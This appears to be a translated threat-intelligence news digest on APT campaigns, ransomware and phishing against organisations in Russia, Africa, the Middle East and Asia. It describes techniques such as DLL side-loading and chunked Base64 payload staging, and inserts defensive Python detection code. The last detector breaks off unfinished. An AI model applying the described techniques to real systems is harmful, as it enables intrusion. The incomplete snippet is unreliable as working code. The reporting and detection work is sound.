"The goals of yesterday's hacktivists have changed: instead of DDoS and defacement, fraudsters are trying to hack and commit destructive actions against the infrastructure of organizations, including critical information infrastructure (CII) facilities. We believe that in 2024 the number of incidents with destructive consequences will increase, and with the growth of import substitution, hackers will begin to use vulnerabilities in Russian software to penetrate," commented Vladislav Lashkin, head of the cyber threats department at the Solar 4RAYS Research Center, Solar Group of Companies.

68% of attacks in Africa are targeted

Positive Technologies analyzed current cyber threats on the African continent in 2022-2023 and presented a study on July 27, 2023. According to the experts' data, the most attacked industry in the region is the financial sector (it accounts for almost every fifth attack, 18% of all successful attacks), and the main motivations of cybercriminals are direct financial benefit and theft of confidential information. At the same time, in addition to hacktivists, organized hacker groups operate in the region, aimed at cyber espionage in addition to financial benefits. Most of the attacks in the studied period were targeted.

Telecommunications ranks second among the most attacked industries (13% of all successful attacks). The five most attacked sectors of the economy also included government agencies (12%), trade (12%) and industrial (10%) organizations.

"The five 'leaders' of Africa's most attacked industries look atypical compared to global statistics. Telecommunications and trade were in the top 5 targets of the attackers, with telecom in second place. A significant increase in customers of telecommunications companies across the continent allows attackers to influence both individual companies and entire regions," said Positive Technologies analyst Ekaterina Semykina. "Criminals attack organizations to disrupt the company and demand ransom for system recovery, as well as to steal user data. Companies need to take steps to prevent exploitation of vulnerabilities and the implementation of unacceptable events. We recommend paying attention to the process of managing vulnerabilities in the organization."

According to the Positive Technologies study, 68% of successful attacks were targeted: in them, attackers aimed at a specific organization, individual or industry. In attacks on organizations, attackers most often attack computers, servers and network equipment (85%).

Web resources became the targets of attackers in 15% of attacks: in these cases the attackers most often managed to carry out successful DDoS attacks. African government and financial institutions are regularly subjected to DDoS attacks by hacktivists. These attacks can have serious consequences for the functioning of important infrastructure systems and services.

Most often, the attacks were aimed at obtaining confidential information: 38% of companies faced this. The actions of criminals also caused interruptions in the work of organizations: in every third successful attack (35%), the main activities of companies were disrupted. 7% of incidents resulted in direct financial losses.

A serious threat to the region is ransomware, which was used in every third attack on organizations that involved malware. Most often, attackers manage to compromise computers, servers and network equipment, which indicates a low level of protection for companies and the presence of vulnerabilities on the network perimeter.

As reported in the study, shadow forums are an active marketplace for access to the networks of large companies in Africa, including government and financial institutions, trading and IT companies. According to open sources, criminals are ready to pay about 300 US dollars for access with domain administrator privileges and 170 US dollars for access with local administrator privileges. In addition, attackers share and offer for sale databases of employees and customers of various companies.

Positive Technologies noted that in order to successfully combat cyber threats in the region, it is necessary to actively develop and implement measures aimed at strengthening cybersecurity. Amid the rapid digital transformation in African countries, there is an urgent need to change the approach to information security. With the increasing availability of the Internet, we can also expect an increase in the activity of international organized cybercriminal networks in the region, and the more digitalized countries of the continent are an attractive target for attackers. At the same time, there are no proper measures to implement cybersecurity in the region, the legislative framework in this area is not well worked out, and the population is extremely poorly aware of the problems associated with information security. All these factors lead to an increase in cyber attacks and significant damage to the countries of the region.

"To ensure the cyber stability of organizations in African countries, including public and private companies, it is critical to identify unacceptable events and protect critical assets," said Alexey Novikov, director of the Positive Technologies security expert center. "It is also recommended to equip yourself with protective equipment and implement measures to monitor and respond to cyber threats. Employee training and investment in the development of information security professionals will also play a key role in improving the cybersecurity of organizations in the African region."

A surge in targeted cyber attacks on the state IT systems of many Arab states was recorded

Positive Technologies experts have recorded a surge in targeted cyber attacks on the state IT systems of many Arab states. The press service of the Russian information security company announced this on July 19, 2023.

According to the study, government agencies in the Middle East are especially attractive targets for cybercriminals: they account for 22% of the total number of attacks on organizations, with 56% of cases being attacks by APT groups. Attackers, using a wide arsenal of malware and exploits, penetrate the victim's IT infrastructure and remain inside for a long time for the purpose of cyber espionage.

Industrial sector enterprises are also at risk (16% of incidents) because they hold valuable information, are critical infrastructure facilities and significantly affect the region's economy. Attackers often use social engineering to gain access to victims' systems (33%), and remote control malware (62%) and software that destroys data (31%) are the tools most often used in attacks on this sector.

According to analysts, 78% of cyber attacks on organizations in the Middle East are directed at computers, servers and network equipment. Attackers compromise systems by downloading malware or exploiting vulnerabilities to steal confidential information or to disrupt the stable operation of devices.

As Positive Technologies noted, a feature of cyber attacks in the Middle East was the use of wipers that destroy files on compromised devices. Wipers are extremely dangerous if they reach the devices of automated process control systems (APCS), as this can lead to production disruption and accidents.

Experts pay special attention to the increase in the activity of ransomware groups, which have become one of the main threats. The number of ransomware incidents worldwide in the first quarter of 2023 increased by 77% compared to the same period of the previous year. The Gulf countries, including the UAE, Saudi Arabia and Kuwait, are the most attacked in the Middle East region.

Russian hackers have replaced imports

Experts from the BI.ZONE cyber intelligence department recorded attacks by the Quartz Wolf group on the hotel business. For the first time, a domestic remote access solution is being used against Russian companies. In this way criminals bypass traditional means of protection and successfully gain a foothold in the business infrastructure. BI.ZONE announced this on July 19, 2023.

Attackers often use foreign remote access tools to gain a foothold in the infrastructure of a compromised company. The most popular programs for this are TeamViewer, AnyDesk and AmmyAdmin. They were often used by the companies themselves for various business purposes, so security services could not block such programs. However, now many Russian organizations are switching to domestic software, so it became possible to block foreign software that attackers can use. The Quartz Wolf group has adapted the attacks: to bypass traditional defenses, it uses domestic solutions for remote access. This increases the chances of attackers to remain unnoticed in the infrastructure.

Attackers send phishing emails on behalf of the Federal Hotel Service company, which helps to transfer registration information and data for migration registration to the Ministry of Internal Affairs. In the messages, the attackers allegedly notify recipients of changes in the registration procedure that have entered into force, which they urgently need to review by following the attached link. The user downloads the archive, opens it and, without knowing it, launches a malicious file. As a result, the Russian remote access solution "ASSISTANT" is installed, software that various companies use for their own business purposes.[5]

Remote access allows attackers to intercept control of a compromised system, block input devices, copy files, modify the registry, use the Windows command line, etc. This opens up opportunities for attackers: from stealing credentials for logging into business systems and transferring client data to a third-party server to making transactions in banking software on behalf of the victim.


Phishing emails remain one of the main methods of gaining initial access during targeted attacks. To protect against them, BI.ZONE experts recommend using specialized solutions that block spam and malicious emails. Continuous IT monitoring services will help you respond effectively to threats. They allow you to quickly recognize advanced attacks and neutralize threats.

Hacker group Space Pirates attacks the public sector, aviation and rocket and space industry in Russia

The hacker group Space Pirates attacks the public sector, the aviation and rocket and space industry in Russia. This was announced on July 17, 2023 by specialists from the Positive Technologies Security Center (PT Expert Security Center, PT ESC).

APT group Dark Pink strikes Asian government and military structures

The APT group Dark Pink is delivering cyber strikes on Asian government and military structures. This became known on January 11, 2023.

During attacks, hackers use a set of powerful custom tools and new tactics.

In its investigation, Group-IB stressed that Dark Pink could be a completely new APT group. The gang of hackers got its name from the names of some of the mailboxes to which the stolen data was sent. However, Chinese researchers gave it a different name, Saaiwc Group.

Group-IB analysts uncovered seven cyberattacks carried out by Dark Pink, and after the discovery of the group's GitHub account they suggested that the attackers entered the cybercriminal arena back in mid-2021.

Most of the attacks targeted the Asia-Pacific region, among the confirmed victims were two military departments in the Philippines and Malaysia, government agencies in Cambodia, Indonesia, Bosnia and Herzegovina, and a religious organization in Vietnam.

During cyber attacks, Dark Pink uses a number of tactics and a set of powerful custom tools: TelePowerBot, KamiKakaBot, Cucky and Ctealer. These modules are used to steal important information that is stored in the networks of government and military organizations.

The group gained initial access to networks using phishing emails with a malicious ISO image inside. In one of the discovered letters, hackers posed as an applicant applying for the position of a public relations intern.

The group has only two main infection methods:

  • DLL side-loading;
  • Changing the registry value that defines the program associated with opening a file. Thus, when a user tries to open the desired document, this leads to the launch of a malicious program embedded in a pre-created copy of this document.

According to experts, Dark Pink not only steals information, but also infects USB devices connected to hacked computers, gains access to instant messengers, and also captures sound from the microphones of hacked devices[6].

Turla Team uses 2013 closed domains to attack victims of old botnet

On January 9, 2023, it became known that Mandiant cybersecurity researchers discovered that the Turla Team group uses the decade-old infrastructure of the Andromeda malware to distribute its spy tools to targets in Ukraine.

According to analysts, the APT group Turla Team (also known as UNC4210) took control of 3 domains that were part of the now defunct command and control (C&C) infrastructure of the Andromeda (Gamarue) botnet in order to reconnect to compromised systems. The ultimate goal was to distribute the KOPILUWAK reconnaissance utility and the QUIETCANARY (Tunnus) backdoor to Andromeda victims.

Andromeda consisted of 464 separate botnets and infected about 1.1 million computers a month. As part of the law enforcement operation in 2017, about 1.5 thousand domains and IP addresses used in the C&C infrastructure were disabled.

Andromeda continues to spread from infected USB devices, so re-registered domains are still dangerous, and attackers can take control of them to deliver new malware to victims. Most likely, Turla Team will compromise systems and then sell access to them on underground forums.

During the discovered incident, an employee of an unnamed Ukrainian organization inserted an infected USB drive into a working computer in December 2021 and clicked on a malicious LNK file masquerading as a folder on the USB drive. This led to the deployment of Andromeda on the host.

It is noteworthy that if the user inserts a "clean" USB drive into an already infected system, this new USB drive can become infected and continue to distribute Andromeda.

The attackers tried to secretly profile systems to identify the most interesting targets, which they then attacked. Mandiant only observed Turla Team server activity for short periods of time, usually a few days, with weeks of downtime[7].

2022

Global darknet access sales rise 40%

The number of accesses to the infrastructure of industrial organizations worldwide put up for sale on the darknet in 2022 amounted to 122, which is 40% more than a year earlier. Positive Technologies experts released such data at the end of February 2023.

Accesses account for 75% of all ads related to industry, and their cost usually ranges from $500 to $5,000. The industrial sector attracts even low-skilled cybercriminals with easy earnings: they gain initial access and then sell it to more competent attackers to further develop the attack, the study said.

In total, in 2022, 223 incidents were recorded in industrial companies caused by attacks by attackers, which is 7% more compared to 2021. The largest number of incidents occurred in the second quarter of 2022 - then 75 successful attacks were identified. Among the attacks on organizations in the industrial sector, 97% were targeted; APT attacks accounted for 17% of the total number of incidents.

Of the successful attacks, 87% were directed to computers, servers and network equipment - the main targets of ransomware. In 44% of cases, attackers attacked the personnel of industrial organizations using malicious emails (94%) and phishing sites (10%). 12% of attacks were directed to the web resources (sites) of industrial sector organizations.

It also follows from the Positive Technologies report that in most successful attacks (70%) on industrial organizations, attackers used malware. Almost half of the cyberattacks (44%) on the industry used social engineering methods. The share of attacks in which software vulnerabilities were exploited was 43%.

A trend of cyber attacks in 2022 was the use of wipers (software that removes data on the device) in attacks on the industrial sector. The use of this malware led to disruption of technological processes and equipment failure.[8]

Log4Shell remains a formidable weapon in the hands of Iranian cybercriminals

An Iranian APT group gained access to a server of a US federal agency using the infamous Log4Shell vulnerability. This became known on November 17, 2022. Experts suggest the hacking operation began in February 2022, and CISA uncovered it two months later.

According to a joint report published by CISA and the FBI, the hackers used Log4Shell to penetrate a vulnerable VMware Horizon server, after which they deployed the XMRig cryptominer on it. The attackers then moved to the domain controller, compromised credentials and installed the Ngrok service on several hosts in order to gain a foothold in the system.

Ngrok is a service that allows you to open access to the internal resources of the machine on which it is running from an external network by creating a public address, all requests for which will be transferred to the local address and the specified port.

Law enforcement agencies did not say which federal organization was the victim of the hackers, saying only that it is one of the Federal Civilian Executive Branch (FCEB) agencies.

In addition, the CISA and FBI report called on all organizations with potentially vulnerable VMware systems to immediately apply all available updates or workarounds, consider possible compromise and scan systems for malware and traces of hacking[9].

The number of cyber attacks on automated control systems in Russia soared by 80%

On September 20, 2022, Kaspersky Lab experts published a study in which they reported an increase in the number of targeted cyber attacks on industrial enterprises in Russia. Most often, malicious objects penetrate computers of automated control systems (ACS) from the Internet.

In January-June 2022, attacks on automation systems using malicious documents increased by 80%, and the share of computers of such systems on which ransomware was blocked increased by 10%, reaching a maximum since 2020.


According to the report, both building automation systems and information systems of organizations located in these buildings were subjected to cyber attacks in the first half of 2022. Also, compared to 2021, the share of attacked APCS computers in the oil and gas industry increased.

According to Evgeny Goncharov, head of the Kaspersky Industrial Systems Emergency Response Team (ICS CERT), not all automated control systems are really isolated from the Internet, and this is the main reason why malware often penetrates technological networks.

"Corporate mail on computers on a technology network paves the way for spyware distributed through phishing emails, often from one industrial enterprise to another in letters disguised as correspondence from victim organizations... It is important to use comprehensive specialized security solutions of the new generation, which, among other things, will protect both the IT and the OT segment within the framework of a single information security system," he explained.

Many attacks on industry begin with attempts to penetrate corporate network devices. Therefore, enterprises need to strengthen the cybersecurity of the technology segment, covering every element of infrastructure, experts added.[10]

APT group behind SolarWinds attack uses MagicWeb malware to post-compromise Active Directory

The attackers responsible for the SolarWinds supply chain attack began to use the MagicWeb malware in the post-compromise phase to maintain constant access to the compromised environment and perform lateral movement. This became known on August 25, 2022. Researchers from Microsoft discovered how the Nobelium APT group uses the backdoor after obtaining administrator rights on an Active Directory Federation Services (AD FS) server.

North Korean APT group attacks South Korean political and diplomatic organizations

The North Korean APT group Kimsuky is conducting a campaign against South Korean political and diplomatic organizations, as well as South Korean university professors, think tank researchers and government officials, according to a Kaspersky Lab report. This became known on August 25, 2022.

Kaspersky Lab previously named the group's backdoor GoldDragon, and the infection chains led to the deployment of Windows malware designed to collect files, log keystrokes and steal web browser login data.

In the discovered campaign, Kimsuky uses phishing messages containing a Word document with macros that supposedly contain content related to geopolitical issues in the region.

The group uses the features of HTML-Application (HTA) and Compiled HTML Help (CHM) files as bait to compromise the system.

Regardless of the method used, after initial access a Visual Basic script is delivered from a remote server; it is designed to fingerprint the victim's machine and retrieve additional payloads, including an executable file for extracting confidential information.

As noted, the campaign also contains a previously unused attack method. If the recipient clicks the link in the email to download additional documents, their email address is sent to the command and control (C&C) server. If the request does not contain the expected email address, the victim is given a legitimate uninfected document to download.

To further complicate the infection chain, the first C&C server forwards the victim's IP address to another VBS server, which then compares it with the incoming request generated after the victim opens the decoy document. "Victim verification" on two C&C servers ensures that the VBScript is delivered only after successful verification of the IP address, which indicates a narrowly targeted attack.

According to Kaspersky Lab, the Kimsuky group is constantly developing its malware infection schemes and implementing updated methods to make analysis difficult. The main difficulty in tracking this group is that it is hard to determine the full infection chain[11].

Attacks by Chinese hackers on Russian defense institutions revealed

On August 8, 2022, Kaspersky Lab reported on the activities of the Chinese-speaking cyber group TA428, which, according to experts, attacks defense enterprises and government agencies in Russia, Eastern Europe and Afghanistan.

It is reported that the hackers are using new modifications of previously known backdoors in targeted attacks. In some cases, the attackers managed to completely seize the IT infrastructure. To do this, they used well-prepared phishing emails. The emails contained internal information that was not available in public sources at the time the cybercriminals used it, including the full names of employees working with confidential information and internal project code names.

Microsoft Word documents with malicious code exploiting the CVE-2017-11882 vulnerability were attached to the phishing emails. The vulnerability allows the malware to gain control of the infected system without additional action from the user; the user is not even required to enable macro execution.

As the main tool for developing the attack, the attackers used the Ladon utility, which can scan the network, find and exploit vulnerabilities, and steal passwords. At the final stage, they seized the domain controller and then gained full control over the organization's workstations and servers that were of interest to them.

Having obtained the necessary rights, the attackers proceeded to search for files containing confidential data and upload them to their own servers deployed in different countries. These same servers were used to control the malware.

"Targeted phishing remains one of the most pressing threats to industrial enterprises and government agencies. The series of attacks that we discovered is apparently not the first in a malicious campaign," said Vyacheslav Kopeitsev, senior expert at Kaspersky ICS CERT.[12]

APT31 cyber group attacks Russian fuel and energy complex and media

In April 2022, during daily threat monitoring, specialists of the PT Expert Security Center at Positive Technologies identified an attack on a number of Russian organizations (media and energy companies) that used a malicious document. Representatives of Positive Technologies reported this to TAdviser on August 4, 2022.

An analysis of the malware used by the attackers showed that the APT31 group was behind these attacks. Both campaigns contained identical fragments of code that obtains information about network adapters and collects data about the infected system, the stubs in the documents were clearly similar, and cloud servers were used to control the malware.

The appearance of a malicious document

A study of the tools revealed that the attackers used the Yandex.Disk service as a control server (a server attackers use to communicate with controlled systems in the victim's network). As Daniil Koloskov, an expert at Positive Technologies, explained, APT31 used a popular cloud service in part to make the traffic look legitimate.

"Previously, this group similarly used the Dropbox cloud service. A similar technique for bypassing network defenses using a legitimate service was also used by the TaskMasters group in its Webdav-O malware," added the Positive Technologies expert.

About digitally signing a legitimate executable file

The malware samples studied date from November 2021 to June 2022. All of them contain legitimate files whose main task is to transfer control to a malicious library using, for example, the DLL side-loading technique (attackers can execute their own malicious payloads by having a legitimate program load their DLLs) and to generate an initialization packet that is sent to the control server. A significant part of the identified legitimate executable files are components of Yandex.Browser and are signed with a valid digital signature.

According to Positive Technologies, two new varieties of malware were identified during the analysis. They were named YaRAT (because it uses Yandex.Disk as a control server and has RAT functionality; RAT stands for remote administration tool) and Stealer0x3401 (after the constant used in obfuscating the encryption; obfuscation is a way to make code harder to analyze or modify when decompiled). In the case of YaRAT, the Yandex.Browser installer signed with a valid Yandex digital signature (or its portable version) was used as the legitimate file vulnerable to DLL side-loading. The Stealer0x3401 malware used the legitimate binary dot1xtray.exe, which loads the malicious library msvcr110.dll.
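A defender-side check for the side-loading pattern described above, as an added example (not Positive Technologies' code): it reads image-load records that use Sysmon Event ID 7 field names and flags a validly signed executable that loads a DLL without a valid signature from its own directory. The sample events, user name and directories are constructed, and the check assumes the log also holds the image-load record of the executable itself, from which its signature state is read.

```python
import ntpath

# Constructed records using Sysmon Event ID 7 (ImageLoad) field names.
# Users and directories are made up; dot1xtray.exe and msvcr110.dll are
# the file names given in the text above.
_TMP = r"C:\Users\anna\AppData\Local\Temp\upd"
SAMPLE_EVENTS = [
    # A signed executable dropped into a temp folder loads itself, then an
    # unsigned runtime-named DLL sitting next to it.
    {"Image": _TMP + r"\dot1xtray.exe", "ImageLoaded": _TMP + r"\dot1xtray.exe",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": _TMP + r"\dot1xtray.exe", "ImageLoaded": _TMP + r"\msvcr110.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"Image": _TMP + r"\dot1xtray.exe", "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    # Benign: an installed application ships a validly signed app-local runtime.
    {"Image": r"C:\Program Files\Acme\viewer.exe", "ImageLoaded": r"C:\Program Files\Acme\viewer.exe",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Program Files\Acme\viewer.exe", "ImageLoaded": r"C:\Program Files\Acme\MSVCR110.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    # Lower priority: unsigned DLL beside a signed binary under Program Files.
    {"Image": r"C:\Program Files\Tools\sync.exe", "ImageLoaded": r"C:\Program Files\Tools\sync.exe",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"Image": r"C:\Program Files\Tools\sync.exe", "ImageLoaded": r"C:\Program Files\Tools\helper.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]

# Path fragments that usually mean a standard user could have written the file.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\downloads\\")


def _validly_signed(event):
    return event.get("Signed", "").lower() == "true" and event.get("SignatureStatus") == "Valid"


def find_sideloading(events):
    """Return loads of a non-validly-signed DLL from the directory of a signed host."""
    # Pass 1: signature state of each executable, taken from its own load record.
    host_signed = {}
    for ev in events:
        image = ntpath.normcase(ev["Image"])
        if ntpath.normcase(ev["ImageLoaded"]) == image:
            host_signed[image] = _validly_signed(ev)

    # Pass 2: DLL loads that match the side-loading shape.
    findings = []
    for ev in events:
        image = ntpath.normcase(ev["Image"])
        loaded = ntpath.normcase(ev["ImageLoaded"])
        if loaded == image or not loaded.endswith(".dll"):
            continue
        if not host_signed.get(image, False):
            continue  # the trusted-signature cover is what makes this pattern work
        if ntpath.dirname(loaded) != ntpath.dirname(image):
            continue  # loaded from elsewhere, e.g. System32
        if _validly_signed(ev):
            continue  # signed app-local libraries are common and expected
        writable = any(marker in image for marker in USER_WRITABLE_MARKERS)
        findings.append({
            "host": ev["Image"],
            "dll": ev["ImageLoaded"],
            "severity": "high" if writable else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_sideloading(SAMPLE_EVENTS):
        print(finding)
```

Because the host binary carries a valid vendor signature, allow-listing by signer alone does not stop this pattern; the location of the executable and the signature state of the libraries it loads are what separate the two cases.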

"In 2021, APT31's activities were noted by us in Mongolia, Russia, the United States and other countries," said Daniil Koloskov. "The attacks we discovered this year have similar techniques for infection and consolidation, numerous intersections within the code, as well as similar artifacts of the compilation tools used. All this allows us to conclude that the group we studied is still functioning and can continue attacks on organizations in Russia."

According to Daniil Koloskov, malware that uses Yandex.Disk as a control server is extremely difficult to detect from its network activity. In effect, this is ordinary legitimate traffic between the client and the service. Such malware can only be detected dynamically, using monitoring tools, including antivirus technologies.

"It is important to work proactively: to tell employees about digital hygiene measures and the phishing techniques used by attackers. In addition, it is advisable to have a separate address in the company where employees can send samples of suspicious emails they receive and report them to information security specialists. Of course, you need to use antivirus products, sandboxes and EDR/XDR class systems to detect and respond to threats," the expert concluded.

Recent 0-day vulnerability in Microsoft Office is already being exploited by a Chinese APT group

The recent 0-day vulnerability in Microsoft Office is already being exploited by Chinese hackers. This became known on June 1, 2022.

Cyber group attacking the public sector, electric power and aerospace industries in Russia discovered

On May 17, 2022, Positive Technologies announced that its security expert center (PT Expert Security Center, PT ESC) had discovered another cybercriminal group. In Russia the attackers hit at least five organizations, in Georgia one, and the exact number of victims in Mongolia is still unknown. Among the targets identified by Positive Technologies specialists are government institutions and enterprises from the aerospace and electric power industries.

Space Pirates Key Links to Known APT Groups, Malware Families, and Network Infrastructure Fragments

According to the data obtained, the previously unknown APT group has been operating since at least 2017; its key interests are espionage and theft of confidential information. Positive Technologies experts named the group Space Pirates after the focus of the first attack they identified, on the aerospace sector, and the string P1Rat that the attackers used in PDB paths.

The expert center first recorded traces of the group's activity at the end of 2019, when a Russian aerospace enterprise received a phishing email with previously unseen malware. Over the next two years, PT ESC specialists identified four more domestic companies (two of them with state participation) that were compromised using the same malware and network infrastructure.

According to Positive Technologies experts, at least two Space Pirates attacks in Russia have achieved their goals. In the first case, the attackers gained access to at least 20 servers on the corporate network, where they were present for about 10 months. During this time, they stole more than 1,500 internal documents, as well as the data of all employee accounts in one of the network domains. In the second, the attackers managed to gain a foothold in the company's network for more than a year, obtain information about the computers on the network and install their malware on at least 12 corporate nodes in three different regions.

Of particular interest is the Space Pirates toolkit, which consists of unusual loaders (in the cases studied, they contained decoys with Russian text) and previously undescribed backdoors such as MyKLoadClient, BH_A006 and Deed RAT.

"The group's own malware is distinctive, so it can be used to determine the involvement of Space Pirates in a particular cyber attack. For example, in the backdoor, which we called Deed RAT, a non-standard method of transferring control to a shellcode is implemented. It is the shellcode that allows attackers to obtain administrator rights on an infected computer," said Alexey Zakharov, senior specialist of the information security threat research department at Positive Technologies.

Space Pirates also has well-known malware in its arsenal: the PlugX, PoisonIvy and Zupdax backdoors and the public ReVBShell shell. The attackers also use the Royal Road RTF (or 8.t) builder and a modified PcShare backdoor, found mainly among hackers of Asian origin, and Chinese is often used in resources, SFX archives and paths to PDB files. The malware is most often distributed through targeted phishing, that is, the group always knows exactly whom it is attacking.

After studying the activities of the APT group, the company's experts also found a large number of intersections with previously known activity, which researchers associate with the groups Winnti (APT41), Bronze Union (APT27), TA428, RedFoxtrot, Mustang Panda and Night Dragon. The likely reason, according to Positive Technologies experts, lies in the exchange of tools between groups. This is a common occurrence for APT groups in the Asian region.

"In one of the investigations, we observed on infected computers the activity of not only the Space Pirates group, but also TA428, and on the network infrastructure in another attack, we traced the connection between Zupdax and the RemShell Trojan attributed to TA428. This allows us to argue that Space Pirates and TA428 can join forces and share tools, network resources and access to infected systems," comments Denis Kuvshinov, Head of Information Security Threat Research at Positive Technologies.

The Positive Technologies Security Expert Center continues to monitor the activity of Space Pirates and its connections with other APT groups.

Russian hackers launched a large-scale targeted phishing campaign

On May 3, 2022, it became known that Russian hackers had launched a large-scale targeted phishing campaign.

In mid-January 2022, Mandiant specialists discovered a targeted phishing campaign launched by the Russian group APT29. The attack was directed at diplomats and government organizations. Previously, the group worked together with APT28, participated in the hacking of the Democratic National Committee, and took part in the wave of attacks aimed at the 2016 US presidential election. In the recent campaign revealed by Mandiant, the attack tool was phishing messages sent from hacked embassy mailboxes in different countries. The state-backed hackers used Atlassian Trello, Dropbox and cloud services as part of their C&C infrastructure.

Experts observed several waves of attacks between January 2022 and March 2022.

Timeline of the 2022 phishing campaign

"APT29 targeted large lists of recipients, most of them public contact persons," said an analysis published by Mandiant. The phishing emails used the malicious HTML dropper ROOTSAW, which uses the HTML smuggling technique to deliver an infected IMG or ISO file to the victim's system.

After the attached file is opened, ROOTSAW writes data to disk in IMG or ISO format. The image contains a Windows shortcut (LNK) and a malicious DLL. When the LNK file is clicked, the malicious DLL is executed. To deceive the victim into running the file, the attackers use a fake icon.

"BEATDROP is written in C and uses Trello to create a C&C server. Immediately after starting, the loader creates a copy of its ntdll.dll library in the device's memory for executing shellcode inside its own process. BEATDROP creates a suspended thread with RtlCreateUserThread pointing to NtCreateFile," the report says. "Then the loader scans the system to obtain the user name, computer name and IP address. From the collected information, a victim ID is created, which BEATDROP uses to store victim data and send malicious packets from the C&C server. Having created an ID, BEATDROP makes a request to Trello and determines whether the victim's account was hacked earlier."

Experts also reported that APT29 replaced BEATDROP with BEACON. This loader is based on Cobalt Strike and implements backdoor capabilities, including keylogging, taking screenshots, collecting and extracting various data, port scanning and much more.

Once entrenched in the target network, the group quickly tries to elevate privileges. Sometimes the hackers managed to obtain domain administrator rights less than 12 hours after a phishing attack.

Having gained access, the attackers conduct extensive reconnaissance of hosts and Active Directory environments. APT29 has also been seen conducting reconnaissance on hosts to collect credentials.

During this phishing campaign, the APT29 group used several families of malware, including the BEATDROP and BOOMMIC loaders, the ROOTSAW HTML dropper, and the BEACON backdoor[13].

Hacker groups cash in on the conflict in Ukraine

In mid-March 2022, at least three different APT groups from around the world launched targeted phishing campaigns, taking advantage of the military conflict in Ukraine as bait for distributing malware and stealing confidential information. This became known on April 4, 2022.

Campaigns by El Machete, Lyceum and SideWinder groups target a variety of sectors, including the energy, financial and state sectors in Nicaragua, Venezuela, Israel, Saudi Arabia and Pakistan.

Attackers use decoys in the form of official-looking documents, news articles or even job ads, depending on the targets and region. According to information security experts at Check Point Research, many decoy documents use malicious macros or template injection to gain a foothold on systems in certain organizations, and then launch malicious attacks and install the open-source remote access Trojan Loki.Rat.

One of the campaigns was organized by the Iranian APT group Lyceum. In their attacks, the hackers used emails purporting to tell of Russian "war crimes" in Ukraine. The emails actually install .NET and Go (Golang) loaders on the victim's system, which are then used to deploy a backdoor from a remote server.

Another example is SideWinder, which supposedly operates in support of India's political interests. In this case, the cybercriminals used a malicious document to exploit the Equation Editor vulnerability in Microsoft Office (CVE-2017-11882) and then distribute information-stealing malware[14].

Anonymous hackers hacked into the sites of major Russian media

On February 28, 2022, the sites of RBC, Forbes, TASS, the newspapers Izvestia, Kommersant, as well as several other publications were hacked. On the main page of each of them there was a message from hackers calling for an end to the special operation in Ukraine.

A message with the emblem of the group began to appear on the websites of publications at about 14:00 Moscow time. Media sites either do not load, or users see a message from the hackers with an appeal. A TAdviser journalist verified this.

The banner is a call to "stop the madness." The link embedded in it leads to a video about the allegedly dead Russian soldiers in Ukraine. The message ends with the words:

"Caring journalists of Russia"

"The official website of our agency was hacked. The attackers posted information on it that is not true. The editorial board of TASS has nothing to do with this statement," the news agency said in a statement.

They also noted that in recent days the TASS website has been under constant massive hacker attacks. By February 28, 2022, to restore the resource's performance, the agency's Department of Corporate Communications said.

Earlier in February 2022, hackers from Anonymous declared a "cyber war" against Russia over a special operation.

"The Anonymous team is officially waging cyber warfare against the Russian government," the hackers said in a statement.

2021

Group-IB studied the malicious campaigns of a pro-state hacker group APT41

On August 18, 2022, Group-IB published a study on the activity of the pro-state hacker group APT41. According to Group-IB Threat Intelligence estimates for 2021, attackers were able to gain access to at least 13 organizations around the world. As part of malicious campaigns, in addition to using interesting techniques, it was possible to find artifacts left by attackers that indicate their origin. Special attention in the report is paid to the analysis of the "working days" of the group.

The pro-state hacker group APT41 (ARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, Double Dragon), whose attacks pursue both cyber espionage and financial gain, has been active since at least 2007. Analysts at Group-IB Threat Intelligence identified 4 malicious APT41 campaigns conducted in 2021, which geographically covered the USA, Taiwan, India, Vietnam and China. The target industries were the public sector, manufacturing, healthcare, logistics, hotel and educational organizations, as well as media and airlines. According to Group-IB data, there were 13 confirmed victims of APT41 in 2021, but their real number may be much greater.

"According to the study, 2021 was quite intense for attackers from APT41," said Group-IB Threat Intelligence analyst. "As a result of an analysis of the tools and indicators of compromise we discovered, we were able to identify malicious activity and warn commercial and government organizations about upcoming or already committed APT41 attacks so that they could take the necessary steps to protect their networks or search them for traces of compromise. In total, in 2021, we proactively sent more than 80 such notifications related to APT41."

Of the reconnaissance tools in the campaigns investigated, the group used the utilities Acunetix, Nmap, SQLmap, OneForAll, subdomain3, subDomainsBrute and Sublist3r. Traditionally, APT41 attackers are credited with phishing, exploiting various vulnerabilities (including ProxyLogon), watering hole attacks or supply chain attacks as the initial penetration vector. However, in the campaigns observed by Group-IB, the attackers infiltrated target systems using SQL injections against websites with the public SQLmap tool. In some organizations, the group gained access to the command shell of the target server; in others, access to databases with information about accounts, employee lists, and passwords in plaintext and hashed form. As a result of such SQL injections, the attackers managed to penetrate the victims' networks in half of the cases: 43 out of 86 websites were vulnerable.

As Group-IB found out, to download and execute malicious code on infected devices the attackers used a unique method of splitting the payload that researchers had not encountered before; the payload was a customized Cobalt Strike Beacon. After compilation, it was encoded in Base64, then split into chunks of exactly 775 characters, which were appended to a text file with a certain command. In one of the cases observed by Group-IB, the attackers needed 154 iterations of this action to write the entire payload to the file. The same non-standard splitting method was found in the network of another organization, where the attackers chose to split the code into blocks of 1024 characters. It took them 128 iterations to write the payload in full without attracting attention.
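A detection for the chunked-write pattern described above, as an added example rather than Group-IB's tooling: it groups process command lines by the file they append to and flags files that receive many Base64 chunks of one fixed width. The `echo <chunk> >> <file>` command shape, the file paths and the sample log are assumptions constructed for illustration, since the text does not name the command used.

```python
import base64
import re
from collections import Counter, defaultdict

# Assumed command shape: echo <chunk> >> <file>. The text above only says
# that chunks were added to a text file "with a certain command".
APPEND_RE = re.compile(
    r'echo\s+"?([A-Za-z0-9+/=]+)"?\s*>>\s*"?([^"\s]+)"?', re.IGNORECASE)


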